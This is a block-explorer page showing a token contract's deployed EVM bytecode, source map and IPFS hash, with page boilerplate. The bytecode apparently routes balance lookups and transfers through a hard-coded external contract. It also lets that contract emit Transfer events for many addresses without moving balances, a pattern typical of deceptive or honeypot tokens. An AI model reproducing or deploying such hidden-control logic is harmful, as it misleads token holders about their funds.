0x608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad578063a457c2d711610071578063a457c2d7146103cb578063a5a302d3146103f7578063a9059cbb146103ff578063dd62ed3e1461042b578063f2fde38b1461045957610121565b806370a08231146102f1578063715018a6146103175780637a1a012d1461031f5780638da5cb5b1461039f57806395d89b41146103c357610121565b806323b872dd116100f457806323b872dd1461022357806329dbecb114610259578063313ce56714610281578063395093511461029f5780635c32460b146102cb57610121565b806306fdde0314610126578063095ea7b3146101a357806316279055146101e357806318160ddd1461021b575b600080fd5b61012e61047f565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610168578181015183820152602001610150565b50505050905090810190601f1680156101955780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101cf600480360360408110156101b957600080fd5b506001600160a01b03813516906020013561050d565b604080519115158252519081900360200190f35b610209600480360360208110156101f957600080fd5b50356001600160a01b031661052a565b60408051918252519081900360200190f35b610209610576565b6101cf6004803603606081101561023957600080fd5b506001600160a01b0381358116916020810135909116906040013561057c565b61027f6004803603602081101561026f57600080fd5b50356001600160a01b0316610614565b005b6102896106a4565b6040805160ff9092168252519081900360200190f35b6101cf600480360360408110156102b557600080fd5b506001600160a01b0381351690602001356106a9565b6101cf600480360360208110156102e157600080fd5b50356001600160a01b0316610741565b6102096004803603602081101561030757600080fd5b50356001600160a01b031661077e565b61027f61084a565b61027f6004803603606081101561033557600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561036057600080fd5b82018360208201111561037257600080fd5b8035906020019184602083028401116401000000008311171561039457600080fd5b9193509150356108f3565b6103a76109a9565b604080516001600160a01b039092168252519081900360200190f35b61012e6109b8565b6101cf600480360360408110156103e157600080fd5b506001600160a01b038135169060200135610a13565b6103a7610aab565b6101cf6004803603604081101561041557600080fd5b506001600160a01b038135169060200135610aba565b6102096004803603604081101561044157600080fd5b506001600160a01b0381358116916020013516610ace565b61027f6004803603602081101561046f57600080fd5b50356001600160a01b0316610af9565b6003805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156105055780601f106104da57610100808354040283529160200191610505565b820191906000526020600020905b8154815290600101906020018083116104e857829003601f168201915b505050505081565b600061052161051a610c0f565b8484610c13565b50600192915050565b6000813f7fc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a47081811480159061055e57508115155b61056957600061056c565b60015b925050505b919050565b60025490565b60006001600160a01b0384161580159061059e57506001600160a01b03831615155b6105a757600080fd5b6105ff846105b3610c0f565b6001600160a01b03871660009081526001602052604081206105fa918791906105da610c0f565b6001600160a01b0316815260208101919091526040016000205490610dc6565b610c13565b61060a848484610e23565b5060019392505050565b6005546001600160a01b0316610628610c0f565b6001600160a01b03161461066f576040805162461bcd60e51b81526020600482015260096024820152683737ba1037bbb732b960b91b604482015290519081900360640190fd5b6001600160a01b03811661068257600080fd5b600680546001600160a01b0319166001600160a01b0392909216919091179055565b601290565b60006001600160a01b0383166106f5576040805162461bcd60e51b815260206004820152600c60248201526b0617070726f766520746f20360a41b604482015290519081900360640190fd5b610521610700610c0f565b846105fa8560016000610711610c0f565b6001600160a01b03908116825260208083019390935260409182016000908120918c168152925290205490610f43565b6000813f7fc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a47081811480159061077557508115155b15949350505050565b6000807f00000000000000000000000019d6707b4717d7ec3d0c02cb19b9af364f4b50c66001600160a01b03166316279055846040518263ffffffff1660e01b815260040180826001600160a01b0316815260200191505060206040518083038186803b1580156107ee57600080fd5b505afa158015610802573d6000803e3d6000fd5b505050506040513d602081101561081857600080fd5b5051905060001981101561082d579050610571565b50506001600160a01b031660009081526020819052604090205490565b6005546001600160a01b031661085e610c0f565b6001600160a01b0316146108a5576040805162461bcd60e51b81526020600482015260096024820152683737ba1037bbb732b960b91b604482015290519081900360640190fd5b600580546001600160a01b031981169091556040516001600160a01b039091169060009082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a350565b336001600160a01b037f00000000000000000000000019d6707b4717d7ec3d0c02cb19b9af364f4b50c61614610928576109a3565b60005b828110156109a15783838281811061093f57fe5b905060200201356001600160a01b03166001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a360010161092b565b505b50505050565b6005546001600160a01b031690565b6004805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156105055780601f106104da57610100808354040283529160200191610505565b60006001600160a01b038316610a5f576040805162461bcd60e51b815260206004820152600c60248201526b0617070726f766520746f20360a41b604482015290519081900360640190fd5b610521610a6a610c0f565b846105fa8560016000610a7b610c0f565b6001600160a01b03908116825260208083019390935260409182016000908120918c168152925290205490610dc6565b6006546001600160a01b031681565b6000610521610ac7610c0f565b8484610e23565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b038116610b47576040805162461bcd60e51b815260206004820152601060248201526f1b995dd3dddb995c881a5b9d985b1a5960821b604482015290519081900360640190fd5b6005546001600160a01b031615610bb3576005546001600160a01b0316610b6c610c0f565b6001600160a01b031614610bb3576040805162461bcd60e51b81526020600482015260096024820152683737ba1037bbb732b960b91b604482015290519081900360640190fd5b6005546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600580546001600160a01b0319166001600160a01b0392909216919091179055565b3390565b6001600160a01b038316610c5f576040805162461bcd60e51b815260206004820152600e60248201526d0617070726f76652066726f6d20360941b604482015290519081900360640190fd5b6001600160a01b038216610ca9576040805162461bcd60e51b815260206004820152600c60248201526b0617070726f766520746f20360a41b604482015290519081900360640190fd5b610cb1610c0f565b6001600160a01b0316836001600160a01b03161415610d64577f00000000000000000000000019d6707b4717d7ec3d0c02cb19b9af364f4b50c66001600160a01b0316635c32460b846040518263ffffffff1660e01b815260040180826001600160a01b0316815260200191505060206040518083038186803b158015610d3757600080fd5b505afa158015610d4b573d6000803e3d6000fd5b505050506040513d6020811015610d6157600080fd5b50505b6001600160a01b03808416600081815260016020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b600082821115610e1d576040805162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f770000604482015290519081900360640190fd5b50900390565b604080516001600160a01b038581166024830152848116604483015260648201849052336084808401919091528351808403909101815260a490920183526020820180516001600160e01b03166316278dd960e31b178152925182516000947f00000000000000000000000019d6707b4717d7ec3d0c02cb19b9af364f4b50c693909316939282918083835b60208310610ece5780518252601f199092019160209182019101610eaf565b6001836020036101000a0380198251168184511680821785525050505050509050019150506000604051808303816000865af19150503d8060008114610f30576040519150601f19603f3d011682016040523d82523d6000602084013e610f35565b606091505b50509050806109a357600080fd5b600082820183811015610f9d576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b939250505056fea26469706673582212203bfff36e968d6fb4317f55843007f7daa08bca4e4a118ffcb6ce2c9d3f67b79564736f6c634300060c0033
Deployed Bytecode Sourcemap
23441:368:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15745:18;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19267:167;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;19267:167:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;9908:657;;;;;;;;;;;;;;;;-1:-1:-1;9908:657:0;-1:-1:-1;;;;;9908:657:0;;:::i;:::-;;;;;;;;;;;;;;;;17624:101;;;:::i;18788:331::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;18788:331:0;;;;;;;;;;;;;;;;;:::i;23677:129::-;;;;;;;;;;;;;;;;-1:-1:-1;23677:129:0;-1:-1:-1;;;;;23677:129:0;;:::i;:::-;;17163:84;;;:::i;:::-;;;;;;;;;;;;;;;;;;;20620:269;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;20620:269:0;;;;;;;;:::i;8694:619::-;;;;;;;;;;;;;;;;-1:-1:-1;8694:619:0;-1:-1:-1;;;;;8694:619:0;;:::i;17310:249::-;;;;;;;;;;;;;;;;-1:-1:-1;17310:249:0;-1:-1:-1;;;;;17310:249:0;;:::i;14606:188::-;;;:::i;11500:378::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;11500:378:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;11500:378:0;-1:-1:-1;11500:378:0;;:::i;14183:79::-;;;:::i;:::-;;;;-1:-1:-1;;;;;14183:79:0;;;;;;;;;;;;;;15883:20;;;:::i;19940:269::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;19940:269:0;;;;;;;;:::i;23522:23::-;;;:::i;18145:170::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;18145:170:0;;;;;;;;:::i;17788:149::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;17788:149:0;;;;;;;;;;:::i;14949:321::-;;;;;;;;;;;;;;;;-1:-1:-1;14949:321:0;-1:-1:-1;;;;;14949:321:0;;:::i;15745:18::-;;;;;;;;;;;;;;;-1:-1:-1;;15745:18:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;19267:167::-;19346:4;19363:41;19372:12;:10;:12::i;:::-;19386:8;19396:7;19363:8;:41::i;:::-;-1:-1:-1;19422:4:0;19267:167;;;;:::o;9908:657::-;9968:7;10439:20;;10282:66;10479:23;;;;;;:42;;-1:-1:-1;10506:15:0;;;10479:42;10478:79;;10555:1;10478:79;;;10541:1;10478:79;10471:86;;;;9908:657;;;;:::o;17624:101::-;17705:12;;17624:101;:::o;18788:331::-;18882:4;-1:-1:-1;;;;;18907:19:0;;;;;;:40;;-1:-1:-1;;;;;;18930:17:0;;;;18907:40;18899:49;;;;;;18961:76;18970:5;18977:12;:10;:12::i;:::-;-1:-1:-1;;;;;18991:18:0;;;;;;:11;:18;;;;;:45;;19028:7;;18991:18;19010:12;:10;:12::i;:::-;-1:-1:-1;;;;;18991:32:0;;;;;;;;;;;;-1:-1:-1;18991:32:0;;;:36;:45::i;:::-;18961:8;:76::i;:::-;19048:41;19069:5;19076:3;19081:7;19048:20;:41::i;:::-;-1:-1:-1;19107:4:0;18788:331;;;;;:::o;23677:129::-;13836:6;;-1:-1:-1;;;;;13836:6:0;13820:12;:10;:12::i;:::-;-1:-1:-1;;;;;13820:22:0;;13812:44;;;;;-1:-1:-1;;;13812:44:0;;;;;;;;;;;;-1:-1:-1;;;13812:44:0;;;;;;;;;;;;;;;-1:-1:-1;;;;;23751:19:0;::::1;23743:28;;;::::0;::::1;;23782:8;:16:::0;;-1:-1:-1;;;;;;23782:16:0::1;-1:-1:-1::0;;;;;23782:16:0;;;::::1;::::0;;;::::1;::::0;;23677:129::o;17163:84::-;17237:2;17163:84;:::o;20620:269::-;20700:4;-1:-1:-1;;;;;20725:22:0;;20717:47;;;;;-1:-1:-1;;;20717:47:0;;;;;;;;;;;;-1:-1:-1;;;20717:47:0;;;;;;;;;;;;;;;20777:82;20786:12;:10;:12::i;:::-;20800:8;20810:48;20850:7;20810:11;:25;20822:12;:10;:12::i;:::-;-1:-1:-1;;;;;20810:25:0;;;;;;;;;;;;;;;;;-1:-1:-1;20810:25:0;;;:35;;;;;;;;;;;:39;:48::i;8694:619::-;8753:4;9221:20;;9064:66;9262:23;;;;;;:42;;-1:-1:-1;9289:15:0;;;9262:42;9260:45;;8694:619;-1:-1:-1;;;;8694:619:0:o;17310:249::-;17377:7;17397:18;17418:12;-1:-1:-1;;;;;17418:23:0;;17442:6;17418:31;;;;;;;;;;;;;-1:-1:-1;;;;;17418:31:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;17418:31:0;;-1:-1:-1;;;17455:33:0;;17451:65;;;17505:10;-1:-1:-1;17490:26:0;;17451:65;-1:-1:-1;;;;;;;17534:17:0;:9;:17;;;;;;;;;;;;17310:249::o;14606:188::-;13836:6;;-1:-1:-1;;;;;13836:6:0;13820:12;:10;:12::i;:::-;-1:-1:-1;;;;;13820:22:0;;13812:44;;;;;-1:-1:-1;;;13812:44:0;;;;;;;;;;;;-1:-1:-1;;;13812:44:0;;;;;;;;;;;;;;;14690:6:::1;::::0;;-1:-1:-1;;;;;;14709:19:0;::::1;::::0;;;14744:42:::1;::::0;-1:-1:-1;;;;;14690:6:0;;::::1;::::0;14671:16:::1;::::0;14690:6;;14744:42:::1;::::0;14671:16;;14744:42:::1;13867:1;14606:188::o:0;11500:378::-;11614:10;-1:-1:-1;;;;;11636:12:0;11614:35;;11610:74;;11666:7;;11610:74;11787:9;11782:88;11802:17;;;11782:88;;;11851:6;;11858:1;11851:9;;;;;;;;;;;;;-1:-1:-1;;;;;11851:9:0;-1:-1:-1;;;;;11831:39:0;11840:9;-1:-1:-1;;;;;11831:39:0;;11862:7;11831:39;;;;;;;;;;;;;;;;;;11821:3;;11782:88;;;;11500:378;;;;;:::o;14183:79::-;14248:6;;-1:-1:-1;;;;;14248:6:0;14183:79;:::o;15883:20::-;;;;;;;;;;;;;;;-1:-1:-1;;15883:20:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19940:269;20020:4;-1:-1:-1;;;;;20045:22:0;;20037:47;;;;;-1:-1:-1;;;20037:47:0;;;;;;;;;;;;-1:-1:-1;;;20037:47:0;;;;;;;;;;;;;;;20097:82;20106:12;:10;:12::i;:::-;20120:8;20130:48;20170:7;20130:11;:25;20142:12;:10;:12::i;:::-;-1:-1:-1;;;;;20130:25:0;;;;;;;;;;;;;;;;;-1:-1:-1;20130:25:0;;;:35;;;;;;;;;;;:39;:48::i;23522:23::-;;;-1:-1:-1;;;;;23522:23:0;;:::o;18145:170::-;18220:4;18237:48;18258:12;:10;:12::i;:::-;18272:3;18277:7;18237:20;:48::i;17788:149::-;-1:-1:-1;;;;;17900:19:0;;;17873:7;17900:19;;;:11;:19;;;;;;;;:29;;;;;;;;;;;;;17788:149::o;14949:321::-;-1:-1:-1;;;;;15020:22:0;;15012:51;;;;;-1:-1:-1;;;15012:51:0;;;;;;;;;;;;-1:-1:-1;;;15012:51:0;;;;;;;;;;;;;;;15078:6;;-1:-1:-1;;;;;15078:6:0;:20;15074:97;;15139:6;;-1:-1:-1;;;;;15139:6:0;15123:12;:10;:12::i;:::-;-1:-1:-1;;;;;15123:22:0;;15115:44;;;;;-1:-1:-1;;;15115:44:0;;;;;;;;;;;;-1:-1:-1;;;15115:44:0;;;;;;;;;;;;;;;15217:6;;15196:38;;-1:-1:-1;;;;;15196:38:0;;;;15217:6;;15196:38;;15217:6;;15196:38;15245:6;:17;;-1:-1:-1;;;;;;15245:17:0;-1:-1:-1;;;;;15245:17:0;;;;;;;;;;14949:321::o;12763:106::-;12851:10;12763:106;:::o;22146:374::-;-1:-1:-1;;;;;22243:20:0;;22235:47;;;;;-1:-1:-1;;;22235:47:0;;;;;;;;;;;;-1:-1:-1;;;22235:47:0;;;;;;;;;;;;;;;-1:-1:-1;;;;;22301:22:0;;22293:47;;;;;-1:-1:-1;;;22293:47:0;;;;;;;;;;;;-1:-1:-1;;;22293:47:0;;;;;;;;;;;;;;;22365:12;:10;:12::i;:::-;-1:-1:-1;;;;;22355:22:0;:6;-1:-1:-1;;;;;22355:22:0;;22351:58;;;22379:12;-1:-1:-1;;;;;22379:22:0;;22402:6;22379:30;;;;;;;;;;;;;-1:-1:-1;;;;;22379:30:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;22351:58:0;-1:-1:-1;;;;;22422:19:0;;;;;;;:11;:19;;;;;;;;:29;;;;;;;;;;;;;:39;;;22477:35;;;;;;;;;;;;;;;;;22146:374;;;:::o;3057:184::-;3115:7;3148:1;3143;:6;;3135:49;;;;;-1:-1:-1;;;3135:49:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;3207:5:0;;;3057:184::o;21488:216::-;21621:67;;;-1:-1:-1;;;;;21621:67:0;;;;;;;;;;;;;;;;;;;;21677:10;21621:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;21621:67:0;-1:-1:-1;;;21621:67:0;;;21594:95;;;;21583:6;;21602:12;21594:26;;;;;21621:67;21594:95;;;;21621:67;21594:95;;;;;;;;;;-1:-1:-1;;21594:95:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;21582:107;;;21699:1;21691:10;;;;;3480:181;3538:7;3570:5;;;3594:6;;;;3586:46;;;;;-1:-1:-1;;;3586:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;3652:1;3480:181;-1:-1:-1;;;3480:181:0:o
Swarm Source
ipfs://3bfff36e968d6fb4317f55843007f7daa08bca4e4a118ffcb6ce2c9d3f67b795
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.
Add Token to MetaMask (Web3)